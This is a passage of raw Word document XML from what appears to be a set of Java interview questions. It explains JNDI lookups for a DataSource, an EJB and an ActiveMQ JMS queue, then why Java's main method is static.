          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C5C0FE6" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C97FD7B" w14:textId="77777777" w:rsidR="00806A73" w:rsidRPr="00CE4B95" w:rsidRDefault="00806A73" w:rsidP="00342FA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D7CD30" w14:textId="55EF79C0" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc197867282"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you access JNDI in java code</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="7F423282" w14:textId="7AC38402" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">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JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2998A34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to access JNDI resources in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE672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tup JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F824A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ccessing JNDI resources, you need to ensure the JNDI provider is correctly configured. This is typically done by creating a Context object and looking up resources using a name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA2DA3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asic outline of how to access JNDI in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3199FE4B"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BBE80">
          <v:rect id="_x0000_i1207" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBD5165"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Access JNDI Resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E87AD7"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InitialContext Object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BD5A5A"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access a JNDI provider, you first need to create an instance of the InitialContext class. It is the entry point for the JNDI lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70401D23"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p>
    <w:p w14:paraId="66AABE06"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the lookup() method of the Context object to fetch the resource by its JNDI name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F48E530"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the Resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D49B0"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lookup is successful, you can cast the object to the correct type and use it as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950CA51"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5808CC">
          <v:rect id="_x0000_i1208" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E560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to Access JNDI in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E7F549"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Accessing a DataSource (Database Connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9ACB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923AEF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ql.DataSource;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FCF6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Connection;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B95F17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SQLException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325D42E4" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDBE47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NDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7A50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E3FA6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580A25F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85F92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String, String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576D41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com.sun.jndi.fscontext.RefFSContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB220E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file:///C:/JNDI"); // Sample provider URL (file system-based JNDI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA46B58" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B708B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D6A7D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51F23FB2" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55825FE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DataSource object using JNDI name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A65C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taSource ds = (DataSource) ctx.lookup("jdbc/myDataSource");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27AE27" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F50F92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 a connection from the DataSource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2073A8C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nection connection = ds.getConnection();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101EE969" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CED121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nected to the database successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDB2D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connection as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A106E" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51D533E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 SQLException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3462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23C0574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106C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CEAF4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280C16"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3E64B68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the Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA5F49"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Hashtable is configured with two properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E646FD"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_CONTEXT_FACTORY</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This specifies the JNDI context factory to be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E3F15"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VIDER_URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the JNDI provider URL. In this case, a file-based provider is being used (file:///C:/JNDI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58070D67"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2199FD2A"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xt ctx = new InitialContext(env) creates an InitialContext object using the environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B91F87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DataSource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4EC22"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Connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7F7F7D"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DataSource is fetched, you can call ds.getConnection() to obtain a database connection from the connection pool managed by the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224ABE7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63AD8">
          <v:rect id="_x0000_i1209" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879D631"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Accessing an EJB (Enterprise Java Bean)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651ACC0C"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012D5A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ejb.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C4E92" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707F397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JBJNDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD53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F04FB3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D266FA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the environment properties for JNDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696517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3FC0A02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jboss.naming.client.InitialContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD6C3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http-remoting://localhost:8080");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BD1E3E" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3E2D6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5861A70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3550CD98" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EC20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EJB using its JNDI name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C388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Remote myEJB = (MyEJBRemote) ctx.lookup("java:global/MyApp/MyEJB!com.example.MyEJBRemote");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3100AF" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF4268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EJB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57769A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someMethod();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C068737" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217E506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JB method invoked successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DE5569" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7F4B2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5772DEE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6CDD0AB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027E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7AFA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5A27FB"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ABC9656"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JNDI Environment for EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE02606"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NDI environment is configured for a remote EJB lookup (using http-remoting://localhost:8080 as the provider URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FAAA4"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3AE23629"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itialContext object is created using the environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1344A1E8"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EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B04010B"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ctx.lookup("java:global/MyApp/MyEJB!com.example.MyEJBRemote") to look up the remote EJB. The JNDI name follows the pattern "java:global/&lt;application_name&gt;/&lt;module_name&gt;/&lt;bean_name&gt;!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8F2F0"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EJB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CC944"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looking up the EJB, you can invoke methods on it as you would with any regular Java object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541F4B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1C6E45">
          <v:rect id="_x0000_i1210" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56077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Accessing a JMS Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25694B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jms.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5374F8B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4976BE14" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B66DC2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MSJNDIExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419C58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BB866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420571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7B9EB3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528273E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apache.activemq.jndi.ActiveMQInitialContextFactory");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A633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tcp://localhost:61616");  // ActiveMQ broker URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003246C" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398EAB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718A7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2ADA7145" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19381C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JMS Queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B5381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 queue = (Queue) ctx.lookup("dynamicQueues/myQueue");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B369C5B" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7919378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Set up JMS connection, session, and message producer/consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577358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JMS connection and session setup omitted for brevity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09DFF4" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E1834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MS Queue lookup successful!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7653DF" w14:textId="77777777" w:rsidR="00744F1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00744F1B" w:rsidP="00F35A2B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7C6F5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2CC975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7B89DE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8E60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149C0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B22E6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4ABF7C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is set for ActiveMQ JMS. The queue is looked up using the JNDI name "dynamicQueues/myQueue".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744E0BA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kup, you can use JMS APIs (e.g., QueueSession, QueueConnection) to send/receive messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122B905"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F4C5E">
          <v:rect id="_x0000_i1211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20F89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teps to Access JNDI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE8C5A"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environment (Hashtable) with relevant properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (context factory, provider URL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B596D"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a Context object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using InitialContext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF26079"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the desired JNDI resource using the lookup() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BCC6F"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st the looked-up object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the appropriate type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208EAD4C"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., sending/receiving messages, interacting with a database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9AF08A"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E1A34B">
          <v:rect id="_x0000_i1212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0A8CE2"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CBC77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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7738BA" w14:textId="102B1155" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc197867283"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is the main method in java static</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1A44CD91" w14:textId="58EF64C2" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B256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n Java is defined as static for several important reasons, all related to the way Java programs are executed. Here's why it's static:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F0220"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try Point for Program Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75516648"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04006F"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291734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0FF185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1554D2D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2A304A"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8B7613"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JVM can directly invoke Main.main() without needing to instantiate the Main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3DA606"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o Object Instantiation Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0416F5F9"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means that the method belongs to the class rather than to an instance of the class. Since the main method is the starting point of the program, it is called by the JVM before any objects are created, so it cannot rely on instance-level variables or methods that require an object to be instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE6F10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istency Across the Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502D89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llows Access to Command-Line Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BB6AB"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CE4B95" w:rsidRDefault="00000000" w:rsidP="003B256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25ADE">
          <v:rect id="_x0000_i1214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E000A7F"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9FA877"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llows the JVM to call the method without creating an instance of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220EC0AA"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s the entry point for program execution, and static ensures it is available for execution before any objects are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B01EEA9"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ensures </w:t>
      </w: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xml:space="preserve"> in how Java programs are started and allows for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>passing of command-line arguments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D8604" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="003B2566">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essence, making the main method static enables the JVM to invoke it directly without the need for an object instantiation, which simplifies the process of program startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26248A2B" w14:textId="35575FE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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D4603" w14:textId="0B37DA45" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc197867284"/>
      <w:r w:rsidRPr="00CE4B95">
